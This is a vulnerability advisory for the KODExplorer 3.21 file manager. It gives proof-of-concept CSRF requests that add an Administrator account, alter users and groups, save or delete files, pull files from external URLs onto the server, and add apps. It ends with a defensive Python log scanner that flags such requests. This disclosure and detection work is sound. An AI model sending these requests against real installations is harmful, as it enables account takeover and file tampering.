
KODExplorer 3.21 Cross Site Request Forgery

Posted on 07 January 2016

================================================================================
# KODExplorer web file manager - Cross Site Request Forgery
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================

Description :
There is no CSRF token protection on the user management area. An attacker can use the PoC below to add, edit or remove any user by sending a link to a logged-in user with User Management privilege.

# PoC :

Add user :
http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator

Delete User :
http://localhost/index.php?member/del&name=[username]

Edit User :
http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password]

Patch released : Check my git https://github.com/benkhlifafahmi/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi (https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group

Additional CSRF Issues:

I - CSRF on Group Management :
Description : An attacker can add, remove or edit any User Group by sending an exploit link to a logged-in admin.
Vulnerable Controller : group.class.php
Proof of Concept :

# Add Group : POST Request
action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extension (ex: php|jsp|etc..)]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1

# Edit Group : POST Request
action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extension (ex: php|jsp|etc..)]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1

# Delete Group :
http://localhost/index.php?group/del&role=[group_name]

------------------------------------------------------------------------
II - CSRF on File Management :
Description : An attacker can add a file, upload a file from an external site, or delete or edit a file/path by sending a link to a logged-in administrator.
Vulnerable Controller : explorer.class.php
Proof of Concept :

# Add a file (1) :
http://localhost/index.php?explorer/mkfile&path=[file name]

# Delete file : POST Request
action URL : http://localhost/index.php?explorer/pathDelete
post data : list[[{"type":"file","path":"[path to file you want to remove]"}]]

# Upload File (2) :
http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want]

# Edit file : POST Request
action URL : http://localhost/index.php?editor/fileSave
Post Data :
path[path to file]
charset[utf-8]
filestr[[file content]]

------------------------------------------------------------------------
III - CSRF on App Management :
Description : An attacker can add, edit or remove any app by sending a link to a logged-in admin.
Vulnerable Controller : app.class.php
Proof of Concept :

# Add app : POST request
action url : http://localhost/index.php?app/add&name=a
POST DATA : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[your app name]%2522%252C%2522desc%2522%253A%2522[your app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D]

# Delete App :
http://localhost/index.php?app/del&name=[your app]

-------------------------------------------------------------------------
IV - Multiple Self XSS :
Description : KODExplorer suffers from many Self XSS issues. The fields vulnerable to XSS are Username, App Name, App Source, Folder Name, File Name and Group Name. To trigger it, inject HTML code into one of the vulnerable fields above.

-------------------------------------------------------------------------
V - Solution :
I have released a fix on my github account; you can clone it or just wait for a patch to be released in the next version, as I have reported all possible vulnerabilities.

-------------------------------------------------------------------------
Thanks :
I want to say "thank you" to:
- Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn
- Arab Oracle Users Group (@araboug) http://www.araboug.org
- @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine.

Special Greetz to my fiancée.
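As an added defender-side example (not part of the advisory or of KODExplorer itself), the script below walks constructed web-server access-log lines and flags the state-changing routes the advisory lists when they arrive via GET or with a missing or cross-site Referer, the two traits a CSRF-driven request leaves behind; the hostnames kod.example and attacker.example are assumptions.

```python
import re
from urllib.parse import urlsplit

# State-changing KODExplorer routes named in the advisory (index.php?<controller>/<action>)
STATE_CHANGING = {
    "member/add", "member/edit", "member/del", "group/add", "group/edit", "group/del",
    "explorer/mkfile", "explorer/pathDelete", "explorer/serverDownload",
    "editor/fileSave", "app/add", "app/del",
}

# Combined log format with Referer: ip - user [ts] "METHOD path HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample access-log lines (hypothetical hosts kod.example / attacker.example)
SAMPLE_LOG = [
    '203.0.113.7 - admin [07/Jan/2016:10:00:01 +0000] "GET /index.php?member/add&name=evil&password=x&role=Administrator HTTP/1.1" 200 512 "http://attacker.example/lure.html" "Mozilla/5.0"',
    '198.51.100.4 - admin [07/Jan/2016:10:00:05 +0000] "POST /index.php?explorer/pathDelete HTTP/1.1" 200 64 "http://kod.example/index.php" "Mozilla/5.0"',
    '198.51.100.4 - admin [07/Jan/2016:10:00:09 +0000] "GET /index.php?explorer/fileDownload&path=a.txt HTTP/1.1" 200 1024 "http://kod.example/index.php" "Mozilla/5.0"',
    '203.0.113.7 - admin [07/Jan/2016:10:00:12 +0000] "POST /index.php?editor/fileSave HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

def kod_route(path):
    """'controller/action' of an index.php request (KODExplorer puts it first in the query), or None."""
    parts = urlsplit(path)
    if not parts.path.endswith("index.php") or not parts.query:
        return None
    return parts.query.split("&", 1)[0]

def same_site(referer, app_host):
    """True only when a Referer is present and on the application's own host."""
    return bool(referer) and referer != "-" and urlsplit(referer).hostname == app_host

def find_csrf_candidates(lines, app_host):
    """Flag state-changing requests a cross-site page could have issued."""
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):
        route = kod_route(m["path"])
        if route not in STATE_CHANGING:
            continue  # read-only or unrelated request
        reasons = []
        if m["method"] == "GET":
            reasons.append("state change via GET")
        if not same_site(m["referer"], app_host):
            reasons.append("missing or cross-site Referer")
        if reasons:
            findings.append((m["ip"], route, m["method"], "; ".join(reasons)))
    return findings
```

Referer is only a heuristic (browsers and privacy extensions may strip it), so treat hits as leads for review; the durable fix is a per-session CSRF token checked on every state-changing route.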
